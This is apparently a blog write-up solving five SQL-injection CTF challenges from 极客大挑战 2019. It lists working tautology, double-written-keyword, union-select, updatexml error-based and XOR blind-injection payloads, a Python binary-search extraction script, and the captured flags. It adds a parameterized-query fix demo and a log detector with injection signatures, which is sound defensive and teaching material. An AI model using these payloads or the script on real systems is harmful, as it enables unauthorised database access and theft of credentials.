光之使者 posted on 2024-5-14 17:41:11

[极客大挑战 2019] Web section write-up (complete!)

SQL section:

[极客大挑战 2019]BabySQL

Opening the environment shows a login page ◕‿◕
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240316172014566-662396620.png
Injection at first glance; start by trying the universal password:
username: admin' or '1'='1
password: 1
GG, it throws up the big banner; that's the only trick I know O.o?? The end, throw confetti (not
꒰ঌ( ⌯' '⌯)໒꒱ Just kidding. It looks like "or" is filtered; later I tried the double-written "oorr" and that didn't work either, so let's keep injecting:
Trying normal union select and similar statements shows they are all filtered, so next double-write all of them:
/check.php?username=admin&password=1 %27 ununionion seselectlect 1 %23
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318145019424-151448907.png
No error this time, but the column count is wrong
So check by binary search, one at a time; a column count of 3 turns out to be right:
/check.php?username=admin&password=1 %27 ununionion seselectlect 1,2,3 %23
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318145120329-157492153.png
The rest is simple; here are the payloads directly:
/check.php?username=admin&password=1 %27 ununionion seselectlect 1,2,database() %23 # dump the current database name
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318145255146-1269676396.png
/check.php?username=admin&password=1 %27 ununionion seselectlect 1,2,group_concat(schema_name)frfromom(infoorrmation_schema.schemata) %23 # list all databases
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318145330821-462195932.png
Saw the ctf database, go into it:
/check.php?username=admin&password=1 %27 ununionion seselectlect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere table_name="Flag" %23
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318150007823-1305345943.png
Just grab the data:
/check.php?username=admin&password=1 %27 ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag) %23
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318150049257-1492995627.png
Got the flag:
flag{ea47f9af-b37b-4f94-a04d-c5b249737afe}

[极客大挑战 2019]EasySQL

Looking at the second challenge, the page hasn't changed; it still looks like this
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318151135374-1880411101.png
Without further ado, try the universal password:
username: 1
passwd: admin' or '1'='1
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318151309786-418792816.png
Huh? Straight out? Fine, this one is clearly a warm-up:
flag{ef920bf4-ed7f-419b-af87-409fa306319a}

[极客大挑战 2019]HardSQL

OK, the challenge author hasn't repented, so let's make it a lesson they never forget (doge
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318151716908-1903579692.png
Same universal-password opener; if it can be done the easy way we won't go into detail o.O
username: admin' or '1'=1'
passwd: 1
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318151921999-254894524.png
Good lad, then I'm coming in!
admin
1' order by 3#? Still like this, huh? Then let Burp's Sniper mode show me how many keywords you've filtered!
Fuzzing shows that spaces, comment symbols, and, by, =, sleep, /, ~ and more are all filtered. Fine, then on to error-based injection:
Use () in place of spaces, like in place of =, and ^ to chain functions into an XOR
Checked the other databases and finally locked onto geek
First, query:
admin'or(updatexml(1,concat(0x7e,database()),1))#
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318154141034-1248006368.png
Good lad, showing your hand now? Next, dump the table names:
admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))),1))#
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318154337114-691939627.png
Continue:
admin'or(updatexml(1%2Cconcat(0x7e%2C(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')))%2C1))%23
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318154409740-459131404.png
Sensitive columns out; that's it, the match is decided ( ´◔︎ ‸◔︎`)
admin'or(updatexml(1,concat(0x7e,(select(group_concat(username,'~',password))from(H4rDsq1))),1))#
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318154522014-775607221.png
But only the left half comes out? Easy, take the left and right halves separately:
admin'or(updatexml(1,concat(0x7e,(select(right(password,30))from(H4rDsq1)where(username)like('flag'))),1))#
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318154657891-1609430077.png
flag{de3015f5-b395-4395-86c8-cf2ddf32e801}

[极客大挑战 2019]LoveSQL

ok, let's see what this guy comes up with next
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318161413539-467462701.png
First enter the universal password:
Username: 1' or 1=1#
Password: 123 (anything)
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318161515464-1858232999.png
It spat out some fields. Next, try union injection; binary search first confirms there are 3 columns:
/check.php?username=1' union select 1,2,3%23&password=1
The echo positions are 2 and 3; check the version number:
/check.php?username=1' union select 1,database(),version()%23&password=1
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318161832740-1494057203.png
Key information: geek is the database name; from here it's the routine steps:
Dump tables:
/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318161932662-833795332.png
Dump columns:
/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318162000882-1261776646.png
Dump data:
/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
Got the flag:
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318162102252-2069416664.png
flag{c76c8911-1aa0-494f-bd2d-1d7356abef1f}
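A defender's look at why the login checks in BabySQL and LoveSQL fall over, and what fixes them. This is an added example, not code from the write-up or from the challenge platform: it runs in Python against an in-memory SQLite table (the challenges use MySQL, so the comment marker here is -- rather than #), the users row is constructed for the demo, and naive_filter models a one-pass keyword blacklist of the kind the double-written "ununionion" trick above slips through. login_parameterized is the mitigation: with bound parameters the same inputs are compared as literal strings and match nothing.

```python
import sqlite3

# Keywords a BabySQL-style filter deletes in a single pass (assumed list).
BLOCKED = ["union", "select", "or", "from", "where"]


def naive_filter(value):
    """One-pass blacklist: each keyword is deleted once, wherever it appears.
    A keyword nested inside itself ("ununionion") loses its inner copy and
    comes out the other side as "union"; the filter never rescans its output."""
    for kw in BLOCKED:
        value = value.replace(kw, "")
    return value


def still_contains_blocked(value):
    """Audit helper: does the filter's own output still contain a blocked word?
    A blacklist that fails this check is not even self-consistent."""
    out = naive_filter(value)
    return any(kw in out for kw in BLOCKED)


def make_db():
    """In-memory users table with one constructed row (plaintext password is demo-only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'S3cret!')")
    return conn


def login_filtered_concat(conn, username, password):
    """The vulnerable pattern: blacklist the input, then concatenate it into SQL."""
    u, p = naive_filter(username), naive_filter(password)
    sql = f"SELECT id, username, password FROM users WHERE username='{u}' AND password='{p}'"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        return []  # a malformed query is treated as a failed login


def login_parameterized(conn, username, password):
    """The fix: bound parameters, so user input is always data and never SQL."""
    sql = "SELECT id, username, password FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    union_payload = "' ununionion seselectlect 1,'injected','x' -- "
    or_payload = "admin' oorr '1'='1"
    print("after filter:", naive_filter(union_payload))
    print("filtered+concat, union payload:", login_filtered_concat(conn, union_payload, "1"))
    print("filtered+concat, or payload:", login_filtered_concat(conn, or_payload, "wrong"))
    print("parameterized, union payload:", login_parameterized(conn, union_payload, "1"))
    print("parameterized, real creds:", login_parameterized(conn, "admin", "S3cret!"))
```

The point of still_contains_blocked is that a filter can be checked against its own output in a unit test; one that returns True on its own survivors is telling you the blacklist approach is the bug, and the parameterized query is the change that makes the whole keyword list unnecessary.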
[极客大挑战 2019]FinalSQL

The last one; what will the little challenge author do this time? 0.0
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318154904035-961266394.png
ok, another pile of clutter; after clicking through each one, the fifth says there is an id=6
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318154947618-1563362035.png
So change it to id=6:
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318155017467-156110500.png
https://img2024.cnblogs.com/blog/3367319/202403/3367319-20240318155030978-454334927.png
That looks like the right direction, so let's analyze:
Test whether this spot is injectable: it turns out there is filtering. Spaces, asterisks and other special characters are filtered, but minus, the XOR operator and division are not, and the test shows a numeric injection rather than a string one. (Test method: passing 1, 2-1, 1/1 and 1^0 all display normally, while 3-1 displays the page for "2".)
In that case it's binary-search blind injection; I'll give everyone the scripts directly, one from a big shot and one of mine:
Script 1:

# -*- coding: utf-8 -*-
import re
import requests
import string
import time

url = "#url+id="
flag = ''


def payload(i, j):
    # database name
    #sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j)
    # table name
    #sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(i,j)
    # column name
    #sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(i,j)
    # query flag
    sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, j)
    data = {"id": sql}
    r = requests.get(url, params=data)
    # print(r.url)
    if "Click" in r.text:
        res = 1
    else:
        res = 0
    return res


def exp():
    global flag
    for i in range(1, 10000):
        print(i, ':')
        low = 31
        high = 127
        # binary search on the character code: the page shows "Click" when ord(char) > mid
        while low < high:
            mid = (low + high) // 2
            if payload(i, mid):
                low = mid + 1
            else:
                high = mid
        if low == 31:   # no character left at this position
            break
        flag += chr(low)
        print(flag)


exp()
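The other side of script 1, from the detection desk: an added example that is not part of the write-up, scanning constructed web-server access-log lines for the request shapes used across these five challenges: double-written keywords, updatexml error extraction, union select over information_schema, tautology logins, and the XOR boolean-blind probe. A binary search like the one above sends one such probe per bit of every extracted character, so a per-client count of those probes is the strongest single signal. The log lines, IPs, paths and threshold are constructed for the demo; the signature set is mine, not a product's, and doubled_forms generalizes the "ununionion" pattern to every split point of every keyword.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Keywords a one-pass filter strips; an attacker nests each inside itself so
# that the stripping pass re-creates it. Assumed list for the demo.
KEYWORDS = ["union", "select", "from", "where", "or", "and"]


def doubled_forms(kw):
    """All self-nested spellings of kw: u+union+nion, un+union+ion, ..."""
    return {kw[:k] + kw + kw[k:] for k in range(1, len(kw))}


DOUBLED = {form for kw in KEYWORDS for form in doubled_forms(kw)}

SIGNATURES = {
    "error-based-function": re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "xor-blind": re.compile(r"\^\s*\(?\s*ord\s*\(\s*substr", re.I),
    "union-select": re.compile(r"\bunion\b.*?\bselect\b", re.I | re.S),
    "tautology": re.compile(r"'\s*or\s*'?1'?\s*=\s*'?1", re.I),
}

# Combined-log-style prefix: client, ident, user, [time] "METHOD target HTTP/x" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def classify(query_string):
    """Return the set of injection signatures found in a URL-decoded query string."""
    q = unquote_plus(query_string).lower()
    tags = {name for name, rx in SIGNATURES.items() if rx.search(q)}
    if any(form in q for form in DOUBLED):
        tags.add("double-written-keyword")
    return tags


def scan_log(lines):
    """Parse each log line and attach the signatures its query string triggers."""
    events = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        parts = urlsplit(target)
        events.append({"ip": ip, "path": parts.path, "status": int(status),
                       "tags": classify(parts.query)})
    return events


def blind_bursts(events, threshold=3):
    """Clients whose boolean-blind probe count reaches threshold; a character-by-
    character binary search needs roughly seven probes per character, so real
    extraction stands out as a burst from one client against one path."""
    counts = Counter(e["ip"] for e in events if "xor-blind" in e["tags"])
    return {ip: n for ip, n in counts.items() if n >= threshold}


# Constructed sample log (not real traffic); query strings mirror the payload shapes above.
BLIND = "/search.php?id=1%5E(ord(substr((select(group_concat(password))from(F1naI1y)),{i},1))%3E{m})%5E1"
SAMPLE_LOG = [
    f'10.0.0.5 - - [18/Mar/2024:15:41:22 +0800] "GET {BLIND.format(i=1, m=79)} HTTP/1.1" 200 1532',
    f'10.0.0.5 - - [18/Mar/2024:15:41:22 +0800] "GET {BLIND.format(i=1, m=103)} HTTP/1.1" 200 1532',
    f'10.0.0.5 - - [18/Mar/2024:15:41:23 +0800] "GET {BLIND.format(i=1, m=115)} HTTP/1.1" 200 1532',
    f'10.0.0.5 - - [18/Mar/2024:15:41:23 +0800] "GET {BLIND.format(i=2, m=79)} HTTP/1.1" 200 1532',
    '10.0.0.7 - - [18/Mar/2024:15:43:01 +0800] "GET /check.php?username=admin%27or(updatexml(1,concat(0x7e,database()),1))%23&password=1 HTTP/1.1" 200 2210',
    '10.0.0.9 - - [18/Mar/2024:15:45:10 +0800] "GET /check.php?username=admin&password=1%20%27%20ununionion%20seselectlect%201,2,database()%20%23 HTTP/1.1" 200 1800',
    '10.0.0.9 - - [18/Mar/2024:15:46:40 +0800] "GET /check.php?username=1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%23&password=1 HTTP/1.1" 200 1900',
    '10.0.0.7 - - [18/Mar/2024:15:47:05 +0800] "GET /check.php?username=1%27%20or%201=1%23&password=123 HTTP/1.1" 200 1700',
    '192.168.1.21 - - [18/Mar/2024:15:48:00 +0800] "GET /check.php?username=alice&password=hunter2 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    events = scan_log(SAMPLE_LOG)
    for e in events:
        print(e["ip"], e["path"], sorted(e["tags"]) or "-")
    print("blind-extraction bursts:", blind_bursts(events))
```

Note that the double-written request is tagged only as double-written-keyword and not as union-select: the nested spelling is exactly what defeats a word-boundary match, so a detector that only looks for clean "union select" would miss the BabySQL traffic entirely. That is why the doubled forms get their own check rather than relying on the generic signatures.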